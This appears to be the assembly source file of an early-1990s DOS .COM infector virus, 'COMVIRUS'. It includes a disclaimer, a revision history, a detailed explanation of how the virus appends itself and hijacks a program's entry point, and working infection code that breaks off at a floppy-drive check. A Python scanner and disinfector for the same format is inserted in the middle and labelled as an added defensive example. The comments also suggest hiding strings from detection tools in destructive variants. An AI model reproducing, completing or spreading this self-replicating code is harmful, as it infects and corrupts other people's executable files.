📄 cv4-30.asm
title COMVIRUS
subttl By Drew Eckhardt
subttl Latest revision: 4-28-1991
;The author of this virus intends it to be used for educational
;purposes only, and assumes no responsibility for its release, or for
;damages resulting from its use, including but not limited to
;equipment damage or data loss.
;By assembling or examining this program, the user agrees to accept all
;responsibility for this program's use, or any portions of the code
;or concepts contained within. The user also agrees not to publicly release
;this virus, and to exercise the necessary precautions to prevent its escape.
;The user accepts all responsibility arising from his actions.
;Don't come crying to me if your hard disk gets infected,
;as THERE IS NO ANTIDOTE. HAHAHAH.
;Revision history:
;4-13: initial bug-free release, size=424 bytes with carrier
;4-15: added no date change support, size=438 bytes with carrier
;4-16: minor documentation changes, size=438 bytes with carrier,
; NO CODE CHANGE from 4-15 revision
;4-21: fixed missing hex h suffixes, made MASM friendly,
; fixed incorrect assume statement (assume statements are ignored
; by A86) enabled hard/floppy infection based on floppy_only status
; size=438 bytes IF floppy_only, 424 bytes if not, with carrier.
; minimum virus length = 419 bytes
;4-23: added control over how many programs are infected per run,
; switched method of infection, from copying to DTA then writing
; to disk to straight write to disk from memory.
; size=412 bytes IF floppy_only, 398 bytes if not, with carrier.
; minimum virus length = 393 bytes
;4-28: used set DTA instead of default DTA/copy command line
; buffer, which had been used based on incorrect assumption
; eliminated calls to get time/date, get attribs
; by using information from find first/find next functions 4eh/4fh
; made warning optional for reduced space if desired. Also
; changed mov reg16, bp add reg16, constant to shorter LEA instruction.
; size=354 bytes IF floppy_only, warning on W/carrier
; 340 bytes IF w/warning & carrier program
; 286 bytes w/o warning, in program
; minimum virus length = 281 bytes for virus itself
;4-28pm: instead of near CALL-pop sequences everywhere, switched to
; a single CALL near ptr Reference_Point, putting the result into
; si now that (until the end) string mode addressing is not used.
; Changed places where a register (used as an index)
; was being loaded THEN added to a single LEA instruction
; size = 340 bytes if floppy_only, warning on w/carrier
; size = 326 bytes if w/warning & carrier
; size = 272 w/o warning
; minimum virus length = 267 bytes for the virus itself
;4-28pm2: Eliminated unnecessary flush buffers call.
; size = 336 bytes if floppy_only w/carrier
; size = 322 bytes w/warning & carrier
; size = 268 w/o warning
; minimum virus length = 263 bytes for virus itself
;4-30: restored 5 bytes of original code at CS:0100
; before infecting other programs, allowing the
; original code field to be modified so one disk write could be
; used instead of two
; minor documentation revisions - corrected incorrect
; opcodes in documentation
; size = 326 bytes if floppy_only w/carrier
; size = 312 bytes w/warning & carrier program
; size = 258 bytes w/carrier program
; Minimum virus length = 253 bytes for the virus itself
;NOTE: The program is currently "set up" for A86 assembly with all
;conditional assembly symbols. #IF and #ENDIF should be replaced with
;MASM IFDEF and ENDIF directives for proper operation.
;Also, instead of using EQUates to define control symbols, the /D
;option or DEFINE could be used.....
;COMVIRUS.ASM must be assembled into a .COM file in order to function
;properly. For convenience, I recommend an assembler like A86 that will
;assemble to a .COM file without having to go through LINK and EXE2BIN.
;As is, it will infect .COM files located on the current disk,
;ONLY if it is a floppy disk, and ONLY in the root directory.
;This is a .COM infector virus which does nothing other than print a
;warning message and spread to all files in the root directory of the
;default disk IFF it is a floppy disk.
;Theory:
;This is a non-overwriting virus. I took special precautions to preserve
;all functionality of the original program, including command line, parsed FCB,
;and segment register preservation. This makes the virus harder to detect.
;The .COM file is a memory image - with no relocation table. Thus, it
;is an easy target for a virus such as this.
;Infected file format
;jmp near ptr xxxx
;cli cli ;ID bytes
;ORIGINAL program code, sans 5 bytes
;5 bytes ORIGINAL program code
;VIRUS
;This format makes infection VERY simple. We merely check for our signature
;(in this case cli cli, fa fa - instructions that no programmer in his
;right mind would use), loading the original five bytes in the process.
;These original bytes are written to the end of the program, followed by
;the virus, and a jump to where the virus is replaces the first bytes.
;While infection is easy, this method presents some coding problems, as the
;virus does not know where in memory it is. Therefore, when we want to access
;data, we FIND OUT where we are by performing a near call, which PUSHES ip to the
;stack; ip is then popped. Addresses are then calculated relative to this
;via LEA.
;To run the program as normal, the command line is restored, registers are restored,
;and the original code is copied back onto the first five bytes of the program.
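A defender-side scanner and cleaner for the infected file format described above. This is an added Python example, not part of the original file: it recognizes the entry jmp plus cli cli signature, locates the saved five bytes and rebuilds the host. It assumes (from the 4-30 revision note and the data layout below) that the appended image begins with the Original_Code field, followed by the optional Warning string, VirusMask and then Infect; the sample host and the infected layout are constructed test data with NOP filler in place of the virus body.

```python
import struct

SIGNATURE = b"\xfa\xfa"                                   # the two CLIs after the entry JMP
MASK = b"*.COM\x00"                                       # VirusMask, sits right before Infect
WARNING = b"This file infected with COMVIRUS 1.0\n\r$"   # optional Warning string (warn_user)
ORIG_FIELD = 5                                            # size of the Original_Code field

def jmp_target(image: bytes):
    """File offset the entry 'jmp near ptr xxxx' (E9 rel16) lands on, or None.
    File offset 0 is CS:0100 in a .COM, and rel16 is relative to the next instruction."""
    if len(image) < 5 or image[0] != 0xE9:
        return None
    target = 3 + struct.unpack_from("<h", image, 1)[0]
    return target if 0 <= target < len(image) else None

def is_infected(image: bytes) -> bool:
    """Signature check: jmp near + 'cli cli' at the entry, VirusMask just before the jmp target."""
    t = jmp_target(image)
    return (t is not None and t >= len(MASK) and image[3:5] == SIGNATURE
            and image[t - len(MASK):t] == MASK)

def original_code_offset(image: bytes) -> int:
    """Offset of the saved 5 host bytes. Assumption (4-30 note + data layout): the appended
    image is Original_Code, optional Warning, VirusMask, then Infect."""
    start_virus = jmp_target(image) - len(MASK)
    if start_virus >= len(WARNING) and image[start_virus - len(WARNING):start_virus] == WARNING:
        start_virus -= len(WARNING)
    return start_virus - ORIG_FIELD

def disinfect(image: bytes) -> bytes:
    """Rebuild the host: saved 5 bytes back in front, then the untouched remainder."""
    if not is_infected(image):
        raise ValueError("not a COMVIRUS-infected .COM image")
    off = original_code_offset(image)
    return image[off:off + ORIG_FIELD] + image[ORIG_FIELD:off]

# Constructed fixture: an 11-byte host (mov ah,9 / mov dx,108h / int 21h / ret / "Hi$")
SAMPLE_HOST = b"\xb4\x09\xba\x08\x01\xcd\x21\xc3Hi$"

def build_infected_sample(host: bytes, warn: bool) -> bytes:
    """Lay a host out as the page describes, with inert NOP filler standing in for the
    virus body. Test fixture only; it contains no infection code."""
    tail = host[:ORIG_FIELD] + (WARNING if warn else b"") + MASK
    infect_off = len(host) + len(tail)      # 5-byte header + host[5:] is len(host) bytes
    header = b"\xe9" + struct.pack("<h", infect_off - 3) + SIGNATURE
    return header + host[ORIG_FIELD:] + tail + b"\x90" * 20

if __name__ == "__main__":
    sample = build_infected_sample(SAMPLE_HOST, warn=True)
    print("infected:", is_infected(sample), "cleaned ok:", disinfect(sample) == SAMPLE_HOST)
```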
;Program control symbols defined here
floppy_only equ 1
infect_per_run equ 1 ;number of programs infected per run
warn_user equ 1
_TEXT segment byte 'CODE'
assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT
org 100h
Start: jmp infect;
;This is our signature
cli
cli
;Original code is the data field where we store the original program code
;which will replace our signature and jmp to infect
Original_Code: int 20h ;five bytes that simply terminate
nop ;the program
nop
nop
;Data for the virus. In a destructive virus, you would want to encrypt
;any strings using a simple one's complement (not) operation so as to
;thwart detection via text search utilities. Since we want detection to
;be easy, this un-encrypted form is fine.
Start_Virus:
#IF warn_user
Warning db "This file infected with COMVIRUS 1.0",10,13,'$'
#ENDIF
;VirusMask is simply an ASCIIZ terminated string of the files we wish to
;infect.
VirusMask db '*.COM', 0
Infect:
push ax ;on entry to a .COM program, STACK:
;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp
;for the two FCB's in here. Save
;'em
;I use special trickery to find location of data. Since
;NEAR calls/jmps are RELATIVE, call near ptr find_warn is
;translated to e8 0000 - which will simply place the location
;of Reference onto the stack. Our data can be found relative to
;this point.
call near ptr Reference ;All data is referenced relative to
;Reference
Reference: pop bx ;which is placed into bx for LEA
;instructions
;bx now contains the REAL address of
;Reference
;si points to real address of original
;code field
lea si, [bx-(offset Reference - offset Original_Code)]
mov di, 0100h ;original code is at 100h
mov cx, 5 ;5 bytes
cld ;from start of buffer
rep movsb ;do it
mov si, bx ;since BX is used in handle
;based DOS calls, for the remainder
;of the virus, si will contain the
;actual address of reference
#IF warn_user
;Always calculate the address of data relative to known Reference
;Point
lea dx, [si-(offset Reference - offset Warning)]
mov ah,9h ;DO dos call, DS:DX pointing
int 21h ;to $ terminated string
;We want to make sure that the user gets the message
WaitForKey:
mov ah, 0bh ;we will wait for a keypress
int 21h ;signifying the user has
or al, al ;seen the message.
jz WaitForKey
#ENDIF
#IF FLOPPY_ONLY
;Since this is a simple demonstration virus, we will only infect
;.COM files on the default drive IFF it is a floppy disk....
;So, we will get information about the disk drive.
push ds ;ds:bx returns a byte to
;media descriptor
mov ah, 1bh ;get disk information STACK
int 21h ;DOIT ax (drive ID's)
cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp